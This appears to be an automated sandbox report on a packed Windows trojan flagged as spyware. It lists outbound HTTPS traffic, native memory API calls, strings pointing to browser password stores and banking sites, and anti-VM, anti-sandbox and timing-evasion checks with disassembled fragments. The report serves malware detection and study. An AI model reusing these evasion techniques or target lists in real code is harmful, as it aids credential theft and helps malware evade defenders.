            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
            Source: unknownHTTPS traffic detected: 104.21.48.252:443 -> 192.168.2.9:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.48.252:443 -> 192.168.2.9:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.48.252:443 -> 192.168.2.9:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.48.252:443 -> 192.168.2.9:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.48.252:443 -> 192.168.2.9:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.48.252:443 -> 192.168.2.9:49711 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.48.252:443 -> 192.168.2.9:49712 version: TLS 1.2

            System Summary

            barindex
            Detected VMProtect packer
            Source: LisectAVT_2403002A_236.exeStatic PE information: .vmp0 and .vmp1 section names
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003E6060 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_003E6060
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003C9080 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_003C9080
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003D20C1 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_003D20C1
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003C4280 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_003C4280
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003C541A NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_003C541A
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003E5440 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_003E5440
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003E24B2 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_003E24B2
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003E5640 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_003E5640
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003C46B7 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_003C46B7
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003C56F7 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_003C56F7
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003E27AF NtOpenSection,0_2_003E27AF
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003E27F1 NtMapViewOfSection,0_2_003E27F1
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003E67D0 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_003E67D0
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003E5810 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_003E5810
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003E286A NtClose,0_2_003E286A
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003CD860 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_003CD860
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003E5940 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_003E5940
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003E2987 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_003E2987
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003E5BD0 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_003E5BD0
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003C4D10 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_003C4D10
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003E5D40 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_003E5D40
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003C8E50 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_003C8E50
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003CCF46 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_003CCF46
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003E0F80 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_003E0F80
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003DF1E0 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_003DF1E0
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003E1220 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_003E1220
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003C2277 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_003C2277
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003C7305 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_003C7305
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003E6400 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_003E6400
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003E14A0 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_003E14A0
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003C6492 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_003C6492
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003CC5F0 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_003CC5F0
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003C960A NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_003C960A
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003E1600 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_003E1600
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003E1710 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_003E1710
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003C2700 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_003C2700
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003CC765 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_003CC765
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003CA762 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_003CA762
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003C6790 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_003C6790
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003E1840 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_003E1840
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003CA880 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_003CA880
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003E1950 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_003E1950
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003E5AB0 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_003E5AB0
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003C7C59 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_003C7C59
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003E2C52 NtFreeVirtualMemory,0_2_003E2C52
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003C9C41 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_003C9C41
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003CEDB2 NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_003CEDB2
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003D0F04 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,0_2_003D0F04
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003E60600_2_003E6060
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003D32160_2_003D3216
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003D12E20_2_003D12E2
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003B46400_2_003B4640
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003CD8600_2_003CD860
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003CCF460_2_003CCF46
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003B51F00_2_003B51F0
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003B32400_2_003B3240
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003D23820_2_003D2382
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003CF3FD0_2_003CF3FD
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003E64000_2_003E6400
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003B64F00_2_003B64F0
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003CD6220_2_003CD622
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003C960A0_2_003C960A
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003B17000_2_003B1700
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003D32160_2_003D3216
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_0040F87F0_2_0040F87F
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003C3A270_2_003C3A27
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003C7A8C0_2_003C7A8C
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003B7B200_2_003B7B20
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003B3C600_2_003B3C60
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003C9C410_2_003C9C41
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003BFDB00_2_003BFDB0
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003D6D8E0_2_003D6D8E
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003B2E700_2_003B2E70
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003B5F300_2_003B5F30
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003D0F040_2_003D0F04
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003C2F770_2_003C2F77
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003DEF800_2_003DEF80
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: String function: 003B8560 appears 44 times
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: String function: 003BFF60 appears 154 times
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: String function: 0040B648 appears 35 times
            Source: LisectAVT_2403002A_236.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: LisectAVT_2403002A_236.exeBinary or memory string: %p.slnB
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372778166.0000000003924000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: LisectAVT_2403002A_236.exeString found in binary or memory: gRAIjEhiRwIjGFyMaK/eUulv3FK6RznFPxa13xzZPGcI8Ndq0kjBPDdM8VeCYp5RRM0+dYlJPh/ADd756Sj6Q6imTq57Sd6eekiPUU7JQT424emp4HFR+4gRT8o4EU/lhCaZMr2BK3bVgyhghLuqtpFxUWpFH1TBljBUZtSeGqeIIGabyB8cwBTUjVEs20rKyuHwHX6O548RE8iltT+VTZlg+tVd+qZNsjAr1Wwebo4o0Uqm7NVKZuzRSGXtgpNJUYaQ
            Source: LisectAVT_2403002A_236.exeString found in binary or memory: q1e2Od4OTFHaXYmrA4aKVUmbiQ4n4+MZLmROvnJ6yzezSSPinQzhbMTdDO9znHdTFLV9oT2ILVkKv+VZz7xhndv5l59fQFVfnl4yeuSiVk+jiJVF0Mr52dH/adDcDoEL+0QvC82BBNvNfiDcOPzSbEn8KbKPFXmSz6flFNV+b2z0Z0nzAmDT941n65Rq3W6uUqPdzrn1rqo0ZhPNJhXpCbZX4iwhntgZ3otzlgZDLr9Rw4cWO50llt0fwf/3t/Dz/sxu
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeFile read: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeSection loaded: wtsapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: LisectAVT_2403002A_236.exeStatic file information: File size 5735941 > 1048576
            Source: LisectAVT_2403002A_236.exeStatic PE information: Raw size of .vmp1 is bigger than: 0x100000 < 0x577c00
            Source: LisectAVT_2403002A_236.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: initial sampleStatic PE information: section where entry point is pointing to: .vmp1
            Source: LisectAVT_2403002A_236.exeStatic PE information: section name: .vmp0
            Source: LisectAVT_2403002A_236.exeStatic PE information: section name: .vmp1
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003F704F push esi; ret 0_2_003F7055
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003F708D push ebp; ret 0_2_003F70E4
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003F5121 push esi; ret 0_2_003F5122
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003F72F3 push ebp; ret 0_2_003F72F8
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003F62C6 push esi; ret 0_2_003F62DE
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003F75D2 push edi; ret 0_2_003F75D4
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003F66BB push ebp; ret 0_2_003F66C2
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_0040B68D push ecx; ret 0_2_0040B6A0
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003F67F5 push esi; ret 0_2_003F67FE
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003F6836 push esi; ret 0_2_003F683C
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003F889C push ebp; ret 0_2_003F88A1
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003F793D push edi; ret 0_2_003F7945
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003F6A3B push ebp; ret 0_2_003F6A3C
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003F6A39 push ebp; ret 0_2_003F6A3A
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_003F6A33 push esi; ret 0_2_003F6A38
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeCode function: 0_2_00409FD0 push ecx; ret 0_2_00409FE3

            Hooking and other Techniques for Hiding and Protection

            barindex
            Overwrites code with unconditional jumps - possibly settings hooks in foreign process
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeMemory written: PID: 6236 base: DF0005 value: E9 8B 2F 75 76 Jump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeMemory written: PID: 6236 base: 77542F90 value: E9 7A D0 8A 89 Jump to behavior
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Query firmware table information (likely to detect VMs)
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeSystem information queried: FirmwareTableInformationJump to behavior
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: LisectAVT_2403002A_236.exe, LisectAVT_2403002A_236.exe, 00000000.00000002.1462827539.00000000003F5000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: ?SBIEDLL.DLL
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeRDTSC instruction interceptor: First address: 946311 second address: 89BEFD instructions: 0x00000000 rdtsc 0x00000002 rol cl, 1 0x00000004 shrd ax, di, 00000068h 0x00000009 ror al, FFFFFFA0h 0x0000000c add cl, FFFFFFFEh 0x0000000f not dl 0x00000011 mov eax, ebp 0x00000013 lahf 0x00000014 not cl 0x00000016 cwd 0x00000018 dec cl 0x0000001a xor bl, cl 0x0000001c stc 0x0000001d rcr dl, cl 0x0000001f mov eax, dword ptr [esp+ecx] 0x00000022 lea ebp, dword ptr [ebp-00000004h] 0x00000028 bsr edx, ebp 0x0000002b mov dword ptr [ebp+00h], eax 0x0000002f sub edi, 00000004h 0x00000035 shr dx, cl 0x00000038 sub dx, 1519h 0x0000003d mov edx, dword ptr [edi] 0x0000003f cmc 0x00000040 cmp esp, ebp 0x00000042 xor edx, ebx 0x00000044 cmc 0x00000045 rol edx, 02h 0x00000048 stc 0x00000049 cmc 0x0000004a cmp ebx, edi 0x0000004c lea edx, dword ptr [edx+360718EFh] 0x00000052 test ch, FFFFFFB5h 0x00000055 cmp ebx, 53A90A0Dh 0x0000005b stc 0x0000005c not edx 0x0000005e cmp bl, dh 0x00000060 cmp dl, FFFFFFFBh 0x00000063 lea edx, dword ptr [edx+25193D95h] 0x00000069 xor ebx, edx 0x0000006b jmp 00007FC658F8C32Ch 0x00000070 add esi, edx 0x00000072 jmp 00007FC6591E2D61h 0x00000077 lea eax, dword ptr [esp+60h] 0x0000007b cmp ebp, eax 0x0000007d jmp 00007FC6591A71BDh 0x00000082 ja 00007FC65950681Dh 0x00000088 jmp esi 0x0000008a sub edi, 00000001h 0x00000090 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeRDTSC instruction interceptor: First address: 8F202E second address: 8F2042 instructions: 0x00000000 rdtsc 0x00000002 movsx ecx, di 0x00000005 mov ebp, esp 0x00000007 push edi 0x00000008 push esi 0x00000009 inc ecx 0x0000000a dec bx 0x0000000d mov ecx, FFFB0000h 0x00000012 xchg ebp, ebx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeRDTSC instruction interceptor: First address: 8969E4 second address: 8969ED instructions: 0x00000000 rdtsc 0x00000002 pop ebp 0x00000003 cbw 0x00000005 pop edi 0x00000006 xchg edx, esi 0x00000008 pop ebx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeRDTSC instruction interceptor: First address: 60051B second address: 60052F instructions: 0x00000000 rdtsc 0x00000002 movsx ecx, di 0x00000005 mov ebp, esp 0x00000007 push edi 0x00000008 push esi 0x00000009 inc ecx 0x0000000a dec bx 0x0000000d mov ecx, FFFB0000h 0x00000012 xchg ebp, ebx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exeRDTSC instruction interceptor: First address: 65CFBC second address: 65CFC5 instructions: 0x00000000 rdtsc 0x00000002 pop ebp 0x00000003 cbw 0x00000005 pop edi 0x00000006 xchg edx, esi 0x00000008 pop ebx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_236.exe TID: 4952Thread sleep time: -210000s >= -30000sJump to behavior
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696497155j
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696497155
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696497155t
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1360508594.0000000001408000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1462122491.0000000001407000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000002.1463953963.0000000001409000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002A_236.exe, 00000000.00000003.1461923804.0000000001407000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696497155o
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
            Source: LisectAVT_2403002A_236.exe, 00000000.00000002.1463772710.00000000013AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
            Source: LisectAVT_2403002A_236.exeBinary or memory string: 9SDokXWuT7k/o0zmFdI+5yZXyfjdDVtvdBCKQMC7RUN74ZnXXnXfhxjfIuiZlHWLOEZh7yU2OUXaC0KOu1lA7guRD8jUl+YL/jV4e4s8Af3Yf0SL+EH9Nir8/I/6cgr8AuehgFsatiaOZiP5ud66KrfNQakFogGwqi01OGshxNLlXk75qdnYqEmja4bFX50KvIXsUhbKrnbOpHRo5rei0yg1qt3msWkBojOykFtdII2ep8Ti5TC6idfMCnds9Npph6Fq
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696497155x
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696497155
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
            Source: LisectAVT_2403002A_236.exe, 00000000.00000003.1372974037.0000000003945000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
